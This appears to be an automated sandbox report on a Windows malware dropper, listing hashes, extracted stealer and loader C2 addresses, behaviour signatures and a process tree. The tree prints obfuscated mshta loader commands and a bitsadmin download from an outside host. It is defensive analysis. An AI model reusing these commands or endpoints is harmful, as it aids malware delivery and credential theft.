Analysis
-
max time kernel
1809s -
max time network
1824s -
platform
windows10_x64 -
resource
win10-ja-20210920 -
submitted
22-10-2021 14:39
General
-
Target
Fri05b5df5106928d62.exe
-
Size
403KB
-
MD5
962b4643e91a2bf03ceeabcdc3d32fff
-
SHA1
994eac3e4f3da82f19c3373fdc9b0d6697a4375d
-
SHA256
d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
-
SHA512
ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd
Malware Config
Extracted
vidar
41.5
937
https://mas.to/@xeroxxx
-
profile_id
937
Extracted
redline
205.185.119.191:60857
Extracted
raccoon
7c9b4504a63ed23664e38808e65948379b790395
-
url4cnc
http://telegka.top/capibar
http://telegin.top/capibar
https://t.me/capibar
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Extracted
icedid
1875681804
Signatures
-
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
Blocklisted process makes network request 45 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 49 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks for any installed AV software in registry 1 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 12 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 17 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 49 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 21 IoCs
-
NSIS installer 4 IoCs
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies Internet Explorer settings 1 TTPs 11 IoCs
-
Modifies data under HKEY_USERS 20 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 7 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 15 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 12 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\hhdevwjC:\Users\Admin\AppData\Roaming\hhdevwj2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\hhdevwjC:\Users\Admin\AppData\Roaming\hhdevwj2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\hhdevwjC:\Users\Admin\AppData\Roaming\hhdevwj2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Fri05b5df5106928d62.exe"C:\Users\Admin\AppData\Local\Temp\Fri05b5df5106928d62.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\1fIUp0v60cJ_08pKOWoXyJV5.exe"C:\Users\Admin\Pictures\Adobe Films\1fIUp0v60cJ_08pKOWoXyJV5.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\5T_dDqe9BOZRM0w75Clii9Df.exe"C:\Users\Admin\Pictures\Adobe Films\5T_dDqe9BOZRM0w75Clii9Df.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5T_dDqe9BOZRM0w75Clii9Df.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\5T_dDqe9BOZRM0w75Clii9Df.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5T_dDqe9BOZRM0w75Clii9Df.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\BHLsp28yO4Kw0dzh4UsLdtd3.exe"C:\Users\Admin\Pictures\Adobe Films\BHLsp28yO4Kw0dzh4UsLdtd3.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 6603⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 6723⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 7283⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 8083⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 11283⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\TGuxiRVGmB26X_6QkgZaU8eO.exe"C:\Users\Admin\Pictures\Adobe Films\TGuxiRVGmB26X_6QkgZaU8eO.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\jCMcVnHiKpgZEJ3STTNvG3C3.exe"C:\Users\Admin\Pictures\Adobe Films\jCMcVnHiKpgZEJ3STTNvG3C3.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\8Uf5SsDkvasOi_9ofOcPvEjM.exe"C:\Users\Admin\Documents\8Uf5SsDkvasOi_9ofOcPvEjM.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\Ch0JMKS7u449GQUfFwraC2Gm.exe"C:\Users\Admin\Pictures\Adobe Films\Ch0JMKS7u449GQUfFwraC2Gm.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Ahxidevwz9NZzrbVuPJ2lYHD.exe"C:\Users\Admin\Pictures\Adobe Films\Ahxidevwz9NZzrbVuPJ2lYHD.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\u4llsHWssHced4u4gF8uO810.exe"C:\Users\Admin\Pictures\Adobe Films\u4llsHWssHced4u4gF8uO810.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\qbU_yOzDlCGncaSayU4RD5BZ.exe"C:\Users\Admin\Pictures\Adobe Films\qbU_yOzDlCGncaSayU4RD5BZ.exe" /mixtwo4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 6525⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 6925⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 6965⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 7085⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 8845⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 8525⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 11045⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\yjyfYdFXEQrnHZ5X3ZDpqIw3.exe"C:\Users\Admin\Pictures\Adobe Films\yjyfYdFXEQrnHZ5X3ZDpqIw3.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\SByjNGB2JsHKzfWdDDspNg7k.exe"C:\Users\Admin\Pictures\Adobe Films\SByjNGB2JsHKzfWdDDspNg7k.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\SByjNGB2JsHKzfWdDDspNg7k.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\SByjNGB2JsHKzfWdDDspNg7k.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )5⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\SByjNGB2JsHKzfWdDDspNg7k.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\SByjNGB2JsHKzfWdDDspNg7k.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "SByjNGB2JsHKzfWdDDspNg7k.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\0M3UQZuwVU2wHx7cGXkc3nxg.exe"C:\Users\Admin\Pictures\Adobe Films\0M3UQZuwVU2wHx7cGXkc3nxg.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\9YKSdM1nam76BrYK50BN16mk.exe"C:\Users\Admin\Pictures\Adobe Films\9YKSdM1nam76BrYK50BN16mk.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-83GSV.tmp\9YKSdM1nam76BrYK50BN16mk.tmp"C:\Users\Admin\AppData\Local\Temp\is-83GSV.tmp\9YKSdM1nam76BrYK50BN16mk.tmp" /SL5="$90214,506127,422400,C:\Users\Admin\Pictures\Adobe Films\9YKSdM1nam76BrYK50BN16mk.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\is-JCMNV.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-JCMNV.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
- Executes dropped EXE
-
C:\Program Files\Internet Explorer\RGGDVYWFGF\foldershare.exe"C:\Program Files\Internet Explorer\RGGDVYWFGF\foldershare.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\a1-486c2-8fa-d3b81-dfa23d0985391\Jatupodugo.exe"C:\Users\Admin\AppData\Local\Temp\a1-486c2-8fa-d3b81-dfa23d0985391\Jatupodugo.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\52-ae62f-977-0969b-ae9f7df2426be\Jiqyvafaeku.exe"C:\Users\Admin\AppData\Local\Temp\52-ae62f-977-0969b-ae9f7df2426be\Jiqyvafaeku.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pftipguj.3t0\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\pftipguj.3t0\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\pftipguj.3t0\GcleanerEU.exe /eufive9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 65210⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 68810⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 66410⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 71210⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 87610⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 92410⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 108810⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2napujj2.22f\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\2napujj2.22f\installer.exeC:\Users\Admin\AppData\Local\Temp\2napujj2.22f\installer.exe /qn CAMPAIGN="654"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\2napujj2.22f\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\2napujj2.22f\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654282 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5v1yn3qj.1xu\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\5v1yn3qj.1xu\any.exeC:\Users\Admin\AppData\Local\Temp\5v1yn3qj.1xu\any.exe9⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mhfgrgfw.5jb\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\mhfgrgfw.5jb\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\mhfgrgfw.5jb\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 93210⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lmfgpmca.msx\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\lmfgpmca.msx\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\lmfgpmca.msx\autosubplayer.exe /S9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA973.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA973.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA973.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA973.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA973.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA973.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA973.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Users\Admin\Pictures\Adobe Films\MSjOsNzmhNT_oW3yQnTmkPiT.exe"C:\Users\Admin\Pictures\Adobe Films\MSjOsNzmhNT_oW3yQnTmkPiT.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1b0,0x1ac,0x1a8,0x1d4,0x1a4,0x7ff901c3dec0,0x7ff901c3ded0,0x7ff901c3dee07⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,3983696179595734693,3921854530737104768,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6024_1123790874" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1652 /prefetch:27⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,3983696179595734693,3921854530737104768,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6024_1123790874" --mojo-platform-channel-handle=1828 /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,3983696179595734693,3921854530737104768,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6024_1123790874" --mojo-platform-channel-handle=2044 /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,3983696179595734693,3921854530737104768,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6024_1123790874" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2580 /prefetch:17⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,3983696179595734693,3921854530737104768,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6024_1123790874" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2684 /prefetch:17⤵
- Executes dropped EXE
